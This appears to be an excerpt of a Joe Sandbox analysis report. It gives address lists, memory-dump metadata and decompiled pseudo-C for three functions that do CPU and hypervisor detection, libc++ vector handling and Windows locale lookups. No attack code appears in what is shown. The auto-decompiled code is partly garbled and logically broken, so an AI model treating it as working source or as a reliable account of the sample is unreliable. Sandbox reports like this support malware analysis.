0x000b0255
0x000b0258
0x000b025d
0x000b0260
0x000b0267
0x000b0267
0x000b026a
0x000b026c
0x000b027f
0x000b0287
0x000b0289
0x000b028c
0x000b026e
0x000b026e
0x000b0270
0x000b0270
0x000b0262
0x000b0262
0x000b0262
0x000b028f
0x000b0292
0x000b0294
0x000b035c
0x000b035c
0x000b035f
0x000b0367
0x000b036a
0x00000000
0x000b029a
0x000b029a
0x000b036d
0x000b036d
0x000b0370
0x000b0370
0x000b0373
0x000b0375
0x000b037b
0x000b037d
0x000b0387
0x000b0387
0x000b0389
0x000b038b
0x000b037f
0x000b037f
0x000b037f
0x000b0377
0x000b0377
0x000b0377
0x000b038e
0x000b038e
0x000b0390
0x000b0393
0x000b0395
0x000b03a3
0x000b03a8
0x000b03ab
0x000b03ae
0x000b03b0
0x000b03b2
0x000b03b5
0x000b03d9
0x000b03d9
0x000b03d9
0x000b03d9
0x000b03dc
0x00000000
0x000b03dc
0x000b03b7
0x000b03ba
0x000b03ba
0x000b03bd
0x000b03bf
0x000b03c5
0x000b03c7
0x000b03cb
0x000b03cb
0x000b03cd
0x000b03cf
0x000b03cf
0x000b03c1
0x000b03c1
0x000b03c1
0x000b03d5
0x000b03d5
0x000b03d7
0x000b03d7
0x00000000
0x000b03d7
0x000b0399
0x000b039b
0x00000000
0x000b039b
0x000b02a0
0x000b02a5
0x000b02ad
0x000b02b5
0x000b02b9
0x000b02be
0x000b02c2
0x000b02c7
0x000b02cc
0x000b02cf
0x000b02d4
0x000b02da
0x000b02e2
0x000b02eb
0x000b02ed
0x000b02f0
0x000b0345
0x000b0345
0x000b0348
0x000b034d
0x000b034d
0x000b0350
0x000b0353
0x000b0355
0x000b0358
0x000b035a
0x00000000
0x00000000
0x00000000
0x000b035a
0x000b0326
0x000b0329
0x000b032c
0x00000000
0x00000000
0x000b032e
0x000b0331
0x000b0334
0x000b0341
0x000b0341
0x00000000
0x000b0331
0x000b0294
0x000b01e7
0x000b01eb
0x000b01ef
0x000b01f3
0x000b01f6
0x000b01fa
0x000b01fe
0x000b0201
0x00000000
0x00000000
0x00000000
0x000b00db
0x000b0108
0x000b0110
0x000b0116
0x000b0119
0x000b012c
0x000b012f
0x000b0131
0x000b0133
0x000b0139
0x000b0139
0x000b013c
0x000b013e
0x000b0141
0x000b0141
0x000b011b
0x000b011b
0x000b011e
0x000b0121
0x000b0121
0x000b0146
0x000b014b
0x000b0191
0x000b0191
0x000b0191
0x00000000
0x000b0191
0x000b014d
0x000b0151
0x000b0154
0x000b0154
0x000b0170
0x000b0170
0x000b0174
0x00000000
0x00000000
0x000b0176
0x000b017b
0x000b0167
0x000b016a
0x000b0275
0x000b0277
0x000b03de
0x000b03de
0x000b03e0
0x000b03ec
0x000b03ec
0x00000000
0x000b016a
0x000b0180
0x000b0160
0x000b0160
0x000b0182
0x000b0184
0x000b018a
0x000b018c
0x000b018c
0x000b0184
0x000b0165
0x00000000
0x00000000
0x00000000
0x00000000
0x000b0165
0x00000000
0x000b0170

APIs

__floor_pentium4.LIBCMT ref: 000B0214
__floor_pentium4.LIBCMT ref: 000B02C7

Strings

K, xrefs: 000B0191, 000B014D, 000B0154, 000B0139

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: __floor_pentium4
String ID: K
API String ID: 4168288129-413224941
Opcode ID: dcf3a2952c4c6b06427487dbeeeea33631deb627272fae4bdcfd8319778523e9
Instruction ID: 53a7861eef5d80e82e8299178d331ff7f877666c9a99df26408d9dd544791588
Opcode Fuzzy Hash: dcf3a2952c4c6b06427487dbeeeea33631deb627272fae4bdcfd8319778523e9
Instruction Fuzzy Hash: 25A1C431F006158FCB19CE69C8846AFB3F2AFD9310B29C669D819BB355E731ED818B41

Uniqueness

Uniqueness Score: -1.00%

Function 000BC650 Relevance: 5.2, Strings: 4, Instructions: 243
COMMONCrypto

Download Yara Rule

C-Code - Quality: 46%

			E000BC650(unsigned int* __ecx, unsigned int __edx, void* __fp0) {
				signed int _v20;
				char _v24;
				intOrPtr _v27;
				unsigned int _v28;
				intOrPtr _v31;
				unsigned int _v32;
				signed char _v36;
				intOrPtr _v40;
				unsigned int _v44;
				unsigned int _v48;
				signed char _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				signed char _v68;
				char _v72;
				unsigned int _v76;
				signed char _v80;
				unsigned int _v84;
				unsigned int _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t75;
				signed int _t98;
				signed int _t100;
				signed int _t124;
				signed int _t125;
				signed int _t128;
				void* _t131;
				char _t135;
				signed char _t136;
				signed int _t139;
				unsigned int _t140;
				signed int _t159;
				signed int _t160;
				signed int _t163;
				signed int _t174;
				unsigned int* _t176;
				signed int _t177;

				_t199 = __fp0;
				_t168 = __edx;
				_t176 = __ecx;
				_t75 =  *0x120014; // 0xf049169a
				_v20 = _t75 ^ _t177;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqu [ebp-0x28], xmm0");
				asm("movdqu [ebp-0x38], xmm0");
				_v27 = 0xffffffff;
				_v31 = 0xffffffff;
				asm("cpuid");
				_t171 = 0;
				_v72 = _t135;
				_v68 = __edx;
				_v64 = 0;
				_v60 = 0;
				_t136 = __ecx + 0x2c;
				L00094920(_t136, __fp0,  &_v72);
				if(0 <= 0) {
					L22:
					asm("cpuid");
					if(0x80000000 >= 0x80000004) {
						_t171 = 0x80000000;
						asm("cpuid");
						_v72 = 0x80000002;
						_v68 = _t136;
						_v64 = 0;
						_v60 = _t168;
						asm("cpuid");
						_v56 = 0x80000003;
						_v52 = _t136;
						_v48 = 0;
						_v44 = _t168;
						asm("cpuid");
						_v40 = 0x80000004;
						_v36 = _t136;
						_v32 = 0;
						_v28 = _t168;
						_v24 = 0;
						L00094920( &(_t176[0xe]), _t199,  &_v72);
						if(0x80000000 >= 0x80000007) {
							asm("cpuid");
							_t168 = _t168 & 0x00000001;
							_t176[0xa] = _t168;
						}
					}
					if(_t176[0xa] == 0) {
						if(_t176[0xa] != 0) {
							asm("cpuid");
							if(_t136 == 0x7263694d && 0 == 0x666f736f && _t168 == 0x76482074) {
								_t176[0xa] = 1;
							}
						}
					}
					if(L000A1C30() != 0) {
						_t176[0xa] = 1;
					}
					return E000DE643(_t81, _t136, _v20 ^ _t177, _t168, _t171, _t176);
				} else {
					_v80 = _t136;
					_v84 = 0;
					asm("cpuid");
					_v88 = 0;
					_t137 = 1;
					if(0 >= 7) {
						_v76 = 1;
						asm("cpuid");
						_t168 = __edx;
						_v84 = 0;
						_t137 = _v76;
					}
					 *_t176 = _t137;
					_t176[4] = _t137 & 0x0000000f;
					_t176[1] = _t137 >> 0x0000000c & 0x00000003;
					_t159 = _t137 >> 0x00000008 & 0x0000000f;
					_t174 = _t137 >> 0x00000004 & 0x0000000f;
					if(_t159 == 0xf) {
						_t98 = _t137 >> 0x00000010 & 0x0000000f;
						_t160 = _t137 >> 0x00000014 & 0x000000ff;
						_t139 = _t98;
						_t171 = _t174 | _t98 << 0x00000004;
						_t100 = _t160;
						_t159 = _t160 + 0xf;
						L18:
						_t176[2] = _t159;
						_t176[3] = _t171;
						_t176[6] = _t100;
						_t176[5] = _t139;
						_t176[7] = _t168 >> 0x00000017 & 0x00000001;
						_t176[7] = _t168 >> 0x00000019 & 0x00000001;
						_t176[7] = _t168 >> 0x0000001a & 0x00000001;
						_t140 = _v88;
						_t176[7] = _t140 & 0x00000001;
						_t176[8] = _t140 >> 0x00000009 & 0x00000001;
						_t176[8] = _t140 >> 0x00000013 & 0x00000001;
						_t176[8] = _t140 >> 0x00000014 & 0x00000001;
						_t176[8] = _t140 >> 0x00000017 & 0x00000001;
						_t176[0xa] = _t140 >> 0x1f;
						_t124 =  !_t140;
						if((_t124 & 0x1c000000) != 0) {
							_t125 = 0;
						} else {
							asm("xgetbv");
							_t125 =  !_t124 & 0xffffff00 | ( !_t124 & 0x00000006) == 0x00000000;
						}
						_t168 = _v84;
						_t176[9] = _t125;
						_t163 = _t140 >> 0x00000019 & 0x00000001;
						_t176[9] = _t163;
						_t136 = _t140 >> 0x0000000c & 0x00000001;
						_t176[9] = _t136;
						_t176[9] = (_t163 & 0xffffff00 | _t168 != 0x00000000) & (_t125 & 0xffffff00 | _t125 != 0x00000000);
						goto L22;
					}
					_t100 = 0;
					if(_t159 != 6) {
						_t139 = 0;
						goto L18;
					}
					_t128 = _t176[0xd] & 0x000000ff;
					_t159 = 6;
					if(_t128 < 0) {
						if(_t176[0xc] != 0xc) {
							L14:
							_t139 = 0;
							L17:
							_t100 = 0;
							goto L18;
						}
						_v80 =  *_v80;
						L12:
						_v76 = _t168;
						_t131 = L000DFD0D(_v80, "GenuineIntel", 0xc);
						_t159 = 6;
						if(_t131 == 0) {
							_t139 = _t137 >> 0x00000010 & 0x0000000f;
							_t171 = _t174 | _t139 << 0x00000004;
						} else {
							_t139 = 0;
						}
						_t168 = _v76;
						goto L17;
					}
					if(_t128 == 0xc) {
						goto L12;
					}
					goto L14;
				}
			}

0x000bc650
0x000bc650
0x000bc659
0x000bc65b
0x000bc662
0x000bc665
0x000bc669
0x000bc66e
0x000bc673
0x000bc67a
0x000bc685
0x000bc687
0x000bc689
0x000bc68c
0x000bc68f
0x000bc692
0x000bc696
0x000bc69f
0x000bc6a6
0x000bc833
0x000bc83a
0x000bc841
0x000bc843
0x000bc84c
0x000bc84e
0x000bc851
0x000bc854
0x000bc857
0x000bc864
0x000bc866
0x000bc869
0x000bc86c
0x000bc86f
0x000bc87c
0x000bc87e
0x000bc881
0x000bc884
0x000bc887
0x000bc88a
0x000bc895
0x000bc8a0
0x000bc8a9
0x000bc8ab
0x000bc8ae
0x000bc8ae
0x000bc8a0
0x000bc8b5
0x000bc8dc
0x000bc8e5
0x000bc8ed
0x000bc8ff
0x000bc8ff
0x000bc8ed
0x000bc8dc
0x000bc8be
0x000bc8c0
0x000bc8c0
0x000bc8d5
0x000bc6ac
0x000bc6ac
0x000bc6af
0x000bc6bd
0x000bc6bf
0x000bc6c2
0x000bc6c7
0x000bc6d2
0x000bc6d5
0x000bc6d7
0x000bc6dc
0x000bc6df
0x000bc6df
0x000bc6e2
0x000bc6e9
0x000bc6f4
0x000bc6fc
0x000bc704
0x000bc70a
0x000bc72b
0x000bc731
0x000bc734
0x000bc739
0x000bc73b
0x000bc73d
0x000bc78c
0x000bc78c
0x000bc78f
0x000bc792
0x000bc795
0x000bc79f
0x000bc7a9
0x000bc7b2
0x000bc7b5
0x000bc7bc
0x000bc7c6
0x000bc7d0
0x000bc7da
0x000bc7e4
0x000bc7ec
0x000bc7f1
0x000bc7f8
0x000bc808
0x000bc7fa
0x000bc7fc
0x000bc803
0x000bc803
0x000bc80a
0x000bc80d
0x000bc815
0x000bc818
0x000bc81e
0x000bc821
0x000bc830
0x00000000
0x000bc830
0x000bc70c
0x000bc711
0x000bc742
0x00000000
0x000bc742
0x000bc713
0x000bc717
0x000bc71e
0x000bc74a
0x000bc776
0x000bc776
0x000bc78a
0x000bc78a
0x00000000
0x000bc78a
0x000bc751
0x000bc754
0x000bc754
0x000bc761
0x000bc769
0x000bc770
0x000bc77d
0x000bc785
0x000bc772
0x000bc772
0x000bc772
0x000bc787
0x00000000
0x000bc787
0x000bc722
0x00000000
0x00000000
0x00000000
0x000bc724

Strings

osof, xrefs: 000BC8EF
t Hv, xrefs: 000BC8F7
Micr, xrefs: 000BC8E7
GenuineIntel, xrefs: 000BC759

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: _strlen
String ID: GenuineIntel$Micr$osof$t Hv
API String ID: 4218353326-1419972731
Opcode ID: 12ae5eeca60f8354ab600f3a6d79f8967f355442317d3374a537639767a5c44e
Instruction ID: f751d45f1f56b49459371869a45cc206164fafa47c55e3ae1ffc2f0d6e15bbc7
Opcode Fuzzy Hash: 12ae5eeca60f8354ab600f3a6d79f8967f355442317d3374a537639767a5c44e
Instruction Fuzzy Hash: 5281E371E043458FEB68CF6D84807DEBBE1AB69310F14463ED48AD7382CA35E949CB54

Uniqueness

Uniqueness Score: -1.00%

Function 000C01F0 Relevance: 5.2, Strings: 4, Instructions: 203
COMMONCrypto

Download Yara Rule

C-Code - Quality: 43%

			E000C01F0(void* __ebx, intOrPtr* __ecx, void* __fp0, unsigned int _a4) {
				unsigned int _v12;
				signed int _v16;
				signed int _v24;
				unsigned int _v28;
				unsigned int _v36;
				void* __edi;
				void* __esi;
				signed int _t47;
				unsigned int* _t53;
				unsigned int _t56;
				unsigned int _t57;
				unsigned int _t59;
				unsigned int _t62;
				unsigned int _t65;
				void* _t68;
				void* _t70;
				unsigned int* _t71;
				intOrPtr _t73;
				unsigned int* _t74;
				signed int _t76;
				unsigned int* _t77;
				unsigned int* _t78;
				unsigned int _t89;
				intOrPtr _t90;
				unsigned int* _t91;
				unsigned int* _t102;
				signed int _t104;
				unsigned int _t106;
				unsigned int _t107;
				unsigned int* _t111;
				unsigned int _t112;
				unsigned int* _t115;
				unsigned int _t117;
				void* _t119;
				void* _t121;
				signed int _t122;
				void* _t124;
				signed int _t126;
				void* _t127;
				void* _t139;

				_t139 = __fp0;
				_t68 = __ebx;
				_t73 =  *__ecx;
				_pop(_t119);
				_t74 = _t73 + 0x28c;
				_t121 = _t119;
				_push(_t121);
				_t122 = _t126;
				_t127 = _t126 - 8;
				_t111 = _t74;
				_t106 = _a4;
				_t47 =  *0x120014; // 0xf049169a
				_v16 = _t47 ^ _t122;
				if(_t106 == 0) {
					L7:
					_t111[5] = _t111[5] + 1;
					_t76 = _t106 >> 0x13;
					_t77 =  *(0x128a6c + _t76 * 4);
					asm("bt ecx, eax");
					if(_t76 >= 0) {
						 *((char*)((_t106 >> 0x15) + 0x130a6c)) = 1;
					} else {
						_push(_t106);
						L0009E930();
						_t127 = _t127 + 4;
					}
					_v28 = _t106;
					_t53 = _t111[1];
					if(_t53 >= _t111[2]) {
						_t77 = _t111;
						E000B10C0( &_v28, _t77, _t139,  &_v28);
						_t56 = _t111[1];
					} else {
						 *_t53 = _t106;
						_v28 = 0;
						_t56 =  &(_t53[1]);
						_t111[1] = _t56;
					}
					if( *_t111 == _t56) {
						_push("back() called on an empty vector");
						_push("!empty()");
						_push(0x233);
						_push("..\\..\\buildtools\\third_party\\libc++\\trunk\\include\\vector");
						_t57 = L00076D4C(_t68, _t77, _t90, _t139, "%s:%d: assertion %s failed: %s");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t78 =  &(_t77[0xa3]);
						_t124 = _t122;
						_push(_t124);
						_push(_t68);
						_push(_t106);
						_push(_t111);
						_push(_t57);
						_t112 =  *_t78;
						_t107 = _t78[1];
						if(_t112 != _t107) {
							_t57 = _v12;
							_t70 = 0;
							while( *(_t112 + _t70) != _t57) {
								_t102 =  &((_t112 + _t70)[1]);
								_t70 = _t70 + 4;
								if(_t102 != _t107) {
									continue;
								} else {
								}
								goto L41;
							}
							_t91 = _t112 + _t70;
							if(_t91 != _t107) {
								if(_t57 != 0) {
									_t78[5] = _t78[5] - 1;
								}
								if(_t78[4] ==  &(_t78[3])) {
									_t115 =  &((_t112 + _t70)[1]);
									_v36 = _t78;
									if(_t115 != _t107) {
										do {
											_t59 =  *(_t115 - 4);
											asm("bt edx, ecx");
											if(_t59 >> 0x13 < 0) {
												_push(_t59);
												L0009EA30(_t59, _t139);
												_t127 = _t127 + 4;
											}
											 *(_t115 - 4) =  *_t115;
											 *_t115 = 0;
											_t115 =  &(_t115[1]);
										} while (_t115 != _t107);
										_t107 =  *(_v36 + 4);
										_t91 =  &(_t115[0xffffffffffffffff]);
									} else {
									}
									if(_t107 != _t91) {
										do {
											_t71 = _t91;
											_t43 = _t107 - 4; // 0x10f0b8
											_t117 = _t43;
											_t44 = _t107 - 4; // 0xaf430
											_t62 =  *_t44;
											asm("bt edx, ecx");
											if(_t62 >> 0x13 < 0) {
												_push(_t62);
												L0009EA30(_t62, _t139);
												_t127 = _t127 + 4;
											}
											 *(_t107 - 4) = 0;
											_t107 = _t117;
											_t91 = _t71;
										} while (_t117 != _t71);
									}
									_t57 = _v36;
									 *(_t57 + 4) = _t91;
								} else {
									_t57 =  *(_t112 + _t70);
									asm("bt edx, ecx");
									if(_t57 >> 0x13 < 0) {
										_push(_t57);
										_t57 = L0009EA30(_t57, _t139);
										_t127 = _t127 + 4;
									}
									 *(_t112 + _t70) = 0;
								}
							}
						}
						L41:
						return _t57;
					} else {
						_t65 = _v28;
						_t104 = _t65 >> 0x13;
						_t90 =  *((intOrPtr*)(0x128a6c + _t104 * 4));
						asm("bt edx, ecx");
						if(_t104 < 0) {
							_push(_t65);
							_t65 = L0009EA30(_t65, _t139);
							_t127 = _t127 + 4;
						}
						goto L16;
					}
				} else {
					_t65 =  *_t111;
					_t89 = _t111[1];
					if(_t65 == _t89) {
						goto L7;
					} else {
						asm("o16 nop [cs:eax+eax]");
						while( *_t65 != _t106) {
							_t65 = _t65 + 4;
							if(_t65 != _t89) {
								continue;
							} else {
								goto L7;
							}
							goto L45;
						}
						if(_t65 != _t89) {
							L16:
							return E000DE643(_t65, _t68, _v24 ^ _t122, _t90, _t106, _t111);
						} else {
							goto L7;
						}
					}
				}
				L45:
			}

0x000c01f0
0x000c01f0
0x000c01f3
0x000c01f5
0x000d7753
0x000d7759
0x000d7760
0x000d7761
0x000d7765
0x000d7768
0x000d776a
0x000d776d
0x000d7774
0x000d7779
0x000d779f
0x000d779f
0x000d77a9
0x000d77ac
0x000d77b3
0x000d77b6
0x000d77c8
0x000d77b8
0x000d77b8
0x000d77b9
0x000d77be
0x000d77be
0x000d77cf
0x000d77d2
0x000d77d8
0x000d77ee
0x000d77f1
0x000d77f6
0x000d77da
0x000d77da
0x000d77dc
0x000d77e3
0x000d77e6
0x000d77e6
0x000d77fb
0x000d783b
0x000d7840
0x000d7845
0x000d784a
0x000d7854
0x000d7859
0x000d785a
0x000d785b
0x000d785c
0x000d785d
0x000d785e
0x000d785f
0x000d7863
0x000d7869
0x000d7870
0x000d7873
0x000d7874
0x000d7875
0x000d7876
0x000d7877
0x000d7879
0x000d787e
0x000d7884
0x000d7887
0x000d7890
0x000d7898
0x000d789b
0x000d78a0
0x00000000
0x00000000
0x000d78a2
0x00000000
0x000d78a0
0x000d78a7
0x000d78ac
0x000d78b4
0x000d78b6
0x000d78b6
0x000d78bf
0x000d78ee
0x000d78f3
0x000d78f6
0x000d7912
0x000d7912
0x000d7926
0x000d7929
0x000d792b
0x000d792c
0x000d7931
0x000d7931
0x000d7902
0x000d7905
0x000d790b
0x000d790e
0x000d7939
0x000d793f
0x00000000
0x000d78f8
0x000d7943
0x000d796f
0x000d796f
0x000d7971
0x000d7971
0x000d7974
0x000d7974
0x000d7988
0x000d798b
0x000d798d
0x000d798e
0x000d7993
0x000d7993
0x000d7960
0x000d7967
0x000d7969
0x000d796b
0x000d796f
0x000d7945
0x000d7948
0x000d78c1
0x000d78c1
0x000d78d5
0x000d78d8
0x000d78da
0x000d78db
0x000d78e0
0x000d78e0
0x000d78e3
0x000d78e3
0x000d78bf
0x000d78ac
0x000d794b
0x000d7952
0x000d77fd
0x000d77fd
0x000d7807
0x000d780a
0x000d7811
0x000d7814
0x000d7816
0x000d7817
0x000d781c
0x000d781c
0x00000000
0x000d7814
0x000d777b
0x000d777b
0x000d777d
0x000d7782
0x00000000
0x000d7784
0x000d7784
0x000d7790
0x000d7798
0x000d779d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x000d779d
0x000d7834
0x000d781f
0x000d782f
0x000d7836
0x00000000
0x000d7836
0x000d7834
0x000d7782
0x00000000

Strings

%s:%d: assertion %s failed: %s, xrefs: 000D784F
..\..\buildtools\third_party\libc++\trunk\include\vector, xrefs: 000D784A
back() called on an empty vector, xrefs: 000D783B
!empty(), xrefs: 000D7840

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID:
String ID: !empty()$%s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\vector$back() called on an empty vector
API String ID: 0-1047145689
Opcode ID: 49ccd8dadd5d6aab734310c26f0c6471fc3f871ec11b58e894464e61c5677fab
Instruction ID: 3ac96c8b6e56ae9fc3cae025598e1ec85516da18c37cded0d4daa23bd1a3e7a8
Opcode Fuzzy Hash: 49ccd8dadd5d6aab734310c26f0c6471fc3f871ec11b58e894464e61c5677fab
Instruction Fuzzy Hash: 98510B71A083058BDB308F18D854A7AF3E6EB80314B54493AE44A9B345FB31FC51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 000FA530 Relevance: 4.7, APIs: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E000FA530(void* __ecx, signed char __edx, intOrPtr _a4) {
				signed int _v8;
				short _v248;
				signed int _v252;
				intOrPtr _v256;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t50;
				int _t56;
				signed int _t58;
				void* _t74;
				intOrPtr _t80;
				void* _t89;
				void* _t92;
				intOrPtr _t93;
				void* _t94;
				signed int _t111;
				signed int _t115;
				intOrPtr* _t117;
				intOrPtr* _t122;
				signed int* _t124;
				int _t126;
				signed int _t127;
				void* _t128;
				void* _t140;

				_t121 = __edx;
				_t50 =  *0x120014; // 0xf049169a
				_v8 = _t50 ^ _t127;
				_t125 = _a4;
				_t94 = E000F55BA(__ecx, __edx, _a4);
				_t124 =  *(E000F55BA(__ecx, __edx, _a4) + 0x34c);
				_t126 = L000FAB2B(_t125);
				asm("sbb ecx, ecx");
				_t56 = GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78);
				_v252 = _v252 & 0x00000000;
				if(_t56 == 0) {
					L37:
					 *_t124 = 0;
					_t58 = 1;
					L38:
					return E000DE643(_t58, _t94, _v8 ^ _t127, _t121, _t124, _t126);
				}
				if(E000F00FF( *((intOrPtr*)(_t94 + 0x54)),  &_v248) != 0) {
					L16:
					if(( *_t124 & 0x00000300) == 0x300) {
						L36:
						_t58 =  !( *_t124 >> 2) & 0x00000001;
						goto L38;
					}
					asm("sbb eax, eax");
					if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
						goto L37;
					}
					_t74 = E000F00FF( *((intOrPtr*)(_t94 + 0x50)),  &_v248);
					if(_t74 != 0) {
						if( *(_t94 + 0x60) == 0 &&  *((intOrPtr*)(_t94 + 0x5c)) != 0 && E000F00FF( *((intOrPtr*)(_t94 + 0x50)),  &_v248) == 0) {
							_push(_t124);
							_t94 = 0;
							if(L000FAABD(_t126, 0) == 0) {
								goto L36;
							}
							 *_t124 =  *_t124 | 0x00000100;
							L34:
							if(_t140 == 0) {
								_t124[1] = _t126;
							}
						}
						goto L36;
					}
					_t111 =  *_t124 | 0x00000200;
					 *_t124 = _t111;
					if( *(_t94 + 0x60) == _t74) {
						if( *((intOrPtr*)(_t94 + 0x5c)) == _t74) {
							goto L20;
						}
						_t122 =  *((intOrPtr*)(_t94 + 0x50));
						_v256 = _t122 + 2;
						do {
							_t80 =  *_t122;
							_t122 = _t122 + 2;
						} while (_t80 != _v252);
						_t121 = _t122 - _v256 >> 1;
						if(_t122 - _v256 >> 1 !=  *((intOrPtr*)(_t94 + 0x5c))) {
							_t74 = 0;
							goto L20;
						}
						_push(_t124);
						if(L000FAABD(_t126, 1) == 0) {
							goto L36;
						}
						 *_t124 =  *_t124 | 0x00000100;
						_t74 = 0;
						L21:
						_t140 = _t124[1] - _t74;
						goto L34;
					}
					L20:
					 *_t124 = _t111 | 0x00000100;
					goto L21;
				}
				asm("sbb eax, eax");
				if(GetLocaleInfoW(_t126, ( ~( *(_t94 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78) == 0) {
					goto L37;
				}
				_t89 = E000F00FF( *((intOrPtr*)(_t94 + 0x50)),  &_v248);
				_t115 =  *_t124;
				if(_t89 != 0) {
					if((_t115 & 0x00000002) != 0) {
						goto L16;
					}
					if( *((intOrPtr*)(_t94 + 0x5c)) == 0) {
						L12:
						_t121 =  *_t124;
						if((_t121 & 0x00000001) != 0 || L000FAA98(_t126) == 0) {
							goto L16;
						} else {
							 *_t124 = _t121;
							goto L15;
						}
					}
					_t92 = L000F027C( *((intOrPtr*)(_t94 + 0x50)),  &_v248,  *((intOrPtr*)(_t94 + 0x5c)));
					_t128 = _t128 + 0xc;
					if(_t92 != 0) {
						goto L12;
					}
					 *_t124 =  *_t124 | 0x00000002;
					_t124[2] = _t126;
					_t117 =  *((intOrPtr*)(_t94 + 0x50));
					_t121 = _t117 + 2;
					do {
						_t93 =  *_t117;
						_t117 = _t117 + 2;
					} while (_t93 != _v252);
					if(_t117 - _t121 >> 1 ==  *((intOrPtr*)(_t94 + 0x5c))) {
						_t124[1] = _t126;
					}
				} else {
					_t124[1] = _t126;
					 *_t124 = _t115 | 0x00000304;
					L15:
					_t124[2] = _t126;
				}
			}

0x000fa530
0x000fa53b
0x000fa542
0x000fa547
0x000fa550
0x000fa558
0x000fa567
0x000fa573
0x000fa584
0x000fa58a
0x000fa593
0x000fa76d
0x000fa76f
0x000fa771
0x000fa772
0x000fa780
0x000fa780
0x000fa5ac
0x000fa667
0x000fa672
0x000fa761
0x000fa768
0x00000000
0x000fa768
0x000fa686
0x000fa69c
0x00000000
0x00000000
0x000fa6ac
0x000fa6b5
0x000fa726
0x000fa742
0x000fa743
0x000fa751
0x00000000
0x00000000
0x000fa753
0x000fa75c
0x000fa75c
0x000fa75e
0x000fa75e
0x000fa75c
0x00000000
0x000fa726
0x000fa6b9
0x000fa6bf
0x000fa6c4
0x000fa6d9
0x00000000
0x00000000
0x000fa6db
0x000fa6e1
0x000fa6e7
0x000fa6e7
0x000fa6ea
0x000fa6ed
0x000fa6fc
0x000fa701
0x000fa71d
0x00000000
0x000fa71d
0x000fa703
0x000fa711
0x00000000
0x00000000
0x000fa713
0x000fa719
0x000fa6ce
0x000fa6ce
0x00000000
0x000fa6ce
0x000fa6c6
0x000fa6cc
0x00000000
0x000fa6cc
0x000fa5c0
0x000fa5d6
0x00000000
0x00000000
0x000fa5e6
0x000fa5ed
0x000fa5f1
0x000fa603
0x00000000
0x00000000
0x000fa609
0x000fa64d
0x000fa64d
0x000fa652
0x00000000
0x000fa65f
0x000fa662
0x00000000
0x000fa662
0x000fa652
0x000fa618
0x000fa61d
0x000fa622
0x00000000
0x00000000
0x000fa624
0x000fa627
0x000fa62a
0x000fa62d
0x000fa630
0x000fa630
0x000fa633
0x000fa636
0x000fa646
0x000fa648
0x000fa648
0x000fa5f3
0x000fa5f9
0x000fa5fc
0x000fa664
0x000fa664
0x000fa664

APIs

Part of subcall function 000F55BA: GetLastError.KERNEL32(?,00000008,000F2B3A), ref: 000F55BE
